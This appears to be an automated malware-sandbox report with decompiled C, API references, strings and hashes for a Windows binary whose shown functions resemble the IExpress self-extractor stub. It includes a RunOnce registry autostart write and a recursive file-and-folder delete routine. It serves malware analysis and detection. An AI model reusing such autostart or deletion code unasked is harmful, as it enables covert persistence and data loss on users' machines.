0x00942fe0
0x00942fe6
0x00942fee
0x00942ff0
0x00942ff5
0x00942ff5
0x00942fee
0x00942fd4
0x00942ff8
0x00942ffe
0x00943004
0x00943017
0x0094301c
0x00943024
0x00943054
0x0094305a
0x00943065
0x00943065
0x0094306c
0x0094306e
0x00943075
0x0094307a
0x0094307a
0x0094307c
0x00943081
0x00943087
0x00943089
0x009430a1
0x009430a1
0x009430a9
0x009430ab
0x009430ad
0x009430af
0x009430af
0x009430ad
0x009430b6
0x00000000
0x0094308b
0x0094308b
0x00943091
0x00000000
0x00000000
0x00943093
0x00943098
0x0094309a
0x00000000
0x00000000
0x0094309c
0x00000000
0x0094309c
0x00943089
0x0094305c
0x00943061
0x00943063
0x00000000
0x00000000
0x00000000
0x00943063
0x0094302b
0x00943032
0x0094303c
0x00000000
0x0094303c
0x00943006
0x0094300c
0x00000000
0x00000000
0x0094300e
0x00943015
0x00000000
0x00000000
0x00000000
0x00943015
0x00942f80
0x00942f3f
0x00942f46
0x00942f5f
0x00942f5f
0x00942f64
0x00942f66
0x00000000
0x00000000
0x00000000
0x00942f66
0x00942f4f
0x00000000
0x00000000
0x00942f55
0x00942f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00942F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00942FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00942FC6
DecryptFileA.ADVAPI32 ref: 00942FE6
FreeLibrary.KERNEL32(00000000), ref: 00942FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094301C

Part of subcall function 009451E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F4D,?,00000002,00000000), ref: 00945201

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00942FDB, 00943017
advapi32.dll, xrefs: 00942F99
DecryptFileA, xrefs: 00942FC0

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1349829096
Opcode ID: 1845545f847fbce5012c9fe1eb9f65fb3389590e81078c60432249efa66d39b7
Instruction ID: e7851c484136d5743e6d422e19c33aca2b2c321ef04eb8632824b5ec85633052
Opcode Fuzzy Hash: 1845545f847fbce5012c9fe1eb9f65fb3389590e81078c60432249efa66d39b7
Instruction Fuzzy Hash: 31412834A242158BDB30AB71AC45F6B33FCEB96754F008266F951C2191EFB4CE80DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00942390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00942390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x948004; // 0xec518a5e
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00946CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00941680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E009416B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00941680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E009416B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E009416B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0094658A( &_v280, 0x104, 0x941140);
								E00942390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00942398
0x0094239e
0x009423a3
0x009423a5
0x009423ae
0x009423b3
0x009424cb
0x009424d2
0x009424d3
0x009424d4
0x009424df
0x009423c2
0x009423d1
0x009423db
0x009423e4
0x009423f6
0x009423fc
0x00942401
0x00000000
0x00000000
0x00000000
0x00000000
0x00942407
0x00942407
0x00942408
0x00942411
0x0094241f
0x0094247a
0x00942483
0x00942495
0x009424a3
0x00942421
0x0094242f
0x00942453
0x0094245d
0x00942466
0x00942472
0x00942472
0x0094242f
0x009424af
0x009424b5
0x009424be
0x009424c5
0x00000000
0x009424c5

APIs

FindFirstFileA.KERNELBASE(?,00948A3A,009411F4,00948A3A,00000000,?,?), ref: 009423F6
lstrcmpA.KERNEL32(?,009411F8), ref: 00942427
lstrcmpA.KERNEL32(?,009411FC), ref: 0094243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00942495
DeleteFileA.KERNEL32(?), ref: 009424A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 009424AF
FindClose.KERNELBASE(00000000), ref: 009424BE
RemoveDirectoryA.KERNELBASE(00948A3A), ref: 009424C5

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 31f892890656b79bf3a5abf9fc4c40549b71bd4dd758d7c1369e798955faaa8f
Instruction ID: 8cfe7d62bbec1d20d22bceb866112e0372cf52d88aaf22e519ba5c43c238db83
Opcode Fuzzy Hash: 31f892890656b79bf3a5abf9fc4c40549b71bd4dd758d7c1369e798955faaa8f
Instruction Fuzzy Hash: 7B3193316187409BC320EBA4DD89FEB73ACFFCA305F44492DB595862A0EB34994DC752

Uniqueness

Uniqueness Score: -1.00%

Function 00942BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00942BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x94a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x949124 = 0;
				if(E00942CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00942F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E009452B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x948a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x949a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00941F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x948588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x949124; // 0x0
				return _t7;
			}

0x00942c03
0x00942c0d
0x00942c18
0x00942c20
0x00942c2e
0x00942c32
0x00942c36
0x00942c3d
0x00942c43
0x00942c45
0x00942c47
0x00942c49
0x00942c4e
0x00942c4e
0x00942c47
0x00942c32
0x00942c20
0x00942c50
0x00942c54
0x00942c57
0x00942c64
0x00942c66
0x00942c6b
0x00942c6d
0x00942c74
0x00942c76
0x00942c7c
0x00942c7e
0x00942c87
0x00942c89
0x00942c89
0x00942c87
0x00942c7c
0x00942c74
0x00942c8e
0x00942c95
0x00942c98
0x00942c98
0x00942c9e
0x00942ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00942C28
CloseHandle.KERNEL32(00000000,?,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C98

Strings

HeapSetInformation, xrefs: 00942C22
Kernel32.dll, xrefs: 00942C13

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 7720340bb2a657642705ce4f609f20fd302fad8101946c19d9ca1cceff2116e2
Instruction ID: da516091cecbb5fd910c208c97c11f5557979f7bb182e45ea1626985afe36007
Opcode Fuzzy Hash: 7720340bb2a657642705ce4f609f20fd302fad8101946c19d9ca1cceff2116e2
Instruction Fuzzy Hash: 371148352283159BD7206FB4ACC8F2F375DBB8A396B440095F880E3250DA70DC81D661

Uniqueness

Uniqueness Score: -1.00%

Function 00946F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00946F40() {

				SetUnhandledExceptionFilter(E00946EF0); // executed
				return 0;
			}

0x00946f45
0x00946f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00946F45

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bf30c0aa323700aab2c95b0b88f5c5d98b8af1f714ee599c69d603e7cdc2fc45
Instruction ID: c1263b0980fcceb9e2e09af5dfb2020d4b57935e52903f4f98797ba8dfcc69bb
Opcode Fuzzy Hash: bf30c0aa323700aab2c95b0b88f5c5d98b8af1f714ee599c69d603e7cdc2fc45
Instruction Fuzzy Hash: 409002AC2A91405796141B749D19C1675D15A8F606B815460A111C4494DB6044506513

Uniqueness

Uniqueness Score: -1.00%

Function 0094202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0094202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x948004; // 0xec518a5e
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00946CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0094171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0094658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x949a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x9491e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x9491e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9491e5);
						if(_t90 != 0) {
							 *0x948580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
							E0094171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E009444B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0094658A( &_v268, 0x104, 0x941140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x948530 = _t66;
				goto L23;
			}

0x0094202a
0x00942035
0x0094203c
0x00942041
0x00942050
0x0094205f
0x00942064
0x0094206f
0x0094208c
0x00942094
0x00942257
0x00942266
0x00942266
0x0094209a
0x0094209b
0x0094209d
0x009420aa
0x009420af
0x009420c9
0x009420d1
0x00000000
0x00000000
0x009420d3
0x009420da
0x00000000
0x00000000
0x00000000
0x009420da
0x009420e2
0x00942103
0x0094210e
0x00942116
0x00942122
0x00942128
0x0094212c
0x00942179
0x00942194
0x009421de
0x009421e4
0x00942256
0x00942256
0x00000000
0x00942256
0x00942196
0x00942196
0x0094219c
0x0094219f
0x0094219f
0x009421a1
0x009421a2
0x009421a6
0x009421a8
0x009421b0
0x009421b0
0x009421b2
0x009421b3
0x009421bc
0x009421c7
0x009421cb
0x009421f1
0x009421f6
0x009421fd
0x009421ff
0x009421ff
0x00942204
0x00942213
0x00942218
0x0094221d
0x0094221d
0x00942220
0x00942220
0x00942222
0x00942223
0x00942229
0x0094223d
0x00942249
0x00942250
0x00000000
0x00942250
0x009421d2
0x009421d9
0x00000000
0x009421d9
0x0094213a
0x00942141
0x00942144
0x0094214c
0x00000000
0x00000000
0x00942163
0x00942172
0x00942172
0x00000000
0x00942163
0x009420ea
0x009420f0
0x00000000

APIs

memset.MSVCRT ref: 00942050
memset.MSVCRT ref: 0094205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0094208C

Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009420C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009420EA
GetSystemDirectoryA.KERNEL32 ref: 00942103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00942134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942144
GetSystemDirectoryA.KERNEL32 ref: 0094215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0094218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009421C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009421E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0094223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00942250

Strings

wextract_cleanup%d, xrefs: 0094209E
%s /D:%s, xrefs: 009421FF, 00942210
wextract_cleanup1, xrefs: 009420A5, 009420BE, 009420F0, 00942232
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009421A8, 00942204
advpack.dll, xrefs: 00942109
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 009421F6
DelNodeRunDLL32, xrefs: 0094212E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00942082

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-4141939531
Opcode ID: bbf72143c9274c87658aa41e6b16e5ea3cb6183c781d51575dd1c5b86b4a21f9
Instruction ID: 92f346fa11f91f70911e90940fbbaf0545b6343f321e1fa4ce1f8c62aa601fb5
Opcode Fuzzy Hash: bbf72143c9274c87658aa41e6b16e5ea3cb6183c781d51575dd1c5b86b4a21f9
Instruction Fuzzy Hash: CA513475A58214ABDB209B60DC49FFB777CFF96700F0001A4FA09E3151EAB09E89CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009455A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E009455A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x948004; // 0xec518a5e
				_v8 = _t28 ^ _t110;
				_t2 = E0094468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0094468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x949a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x948b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x948a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00946517(_t82, 0x7d2, 0, E00943210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x949a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x9491e4;
									_t40 = GetTempPathA(0x104, 0x9491e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00941781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00946952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0094597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00942630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0094658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x9491e4;
																					E00941781(0x9491e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00945467(0x9491e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00942630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0094597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00945467(0x9491e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x9491e4;
											_t70 = E00942630(0, 0x9491e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x9491e4;
												_t71 = E00945467(0x9491e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0094597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x948b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00945467(0x948b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E009444B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x949124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x949124 = E00946285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00946CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x009455ab
0x009455b2
0x009455c9
0x009455d5
0x009455d9
0x00945600
0x00945605
0x0094560a
0x0094560c
0x00945638
0x00945641
0x00945643
0x00945645
0x00945645
0x0094564c
0x00945652
0x00945657
0x00945659
0x00945696
0x0094569c
0x0094589f
0x009458a7
0x009458ac
0x009458b3
0x009458b5
0x009456a2
0x009456a2
0x009456a8
0x00000000
0x009456ae
0x009456ae
0x009456b9
0x009456bf
0x009456c1
0x009456f3
0x009456f3
0x00945705
0x0094570a
0x00945711
0x00945717
0x00945724
0x00945726
0x00945729
0x00945730
0x00945737
0x0094573d
0x00945740
0x00000000
0x00000000
0x00000000
0x00000000
0x0094572b
0x0094572b
0x0094572e
0x00945742
0x00945742
0x00945745
0x0094576b
0x0094576b
0x00000000
0x00945747
0x00945747
0x0094574d
0x0094574f
0x00945771
0x00945771
0x00945773
0x00000000
0x00945751
0x00945751
0x00945753
0x00000000
0x00945755
0x0094575b
0x00945760
0x00945762
0x00000000
0x00945764
0x00945764
0x00945769
0x0094577e
0x0094577e
0x00945781
0x00945788
0x0094578d
0x0094578f
0x009457b2
0x009457b8
0x009457bd
0x009457bf
0x009457cd
0x009457cd
0x009457dd
0x009457e3
0x009457ef
0x009457f5
0x009457f8
0x0094580a
0x0094580a
0x009457fa
0x00945802
0x00945802
0x0094580d
0x0094580f
0x00945830
0x00945836
0x0094583d
0x0094584b
0x00945851
0x00945855
0x0094585a
0x0094585c
0x00000000
0x0094585e
0x0094585e
0x00000000
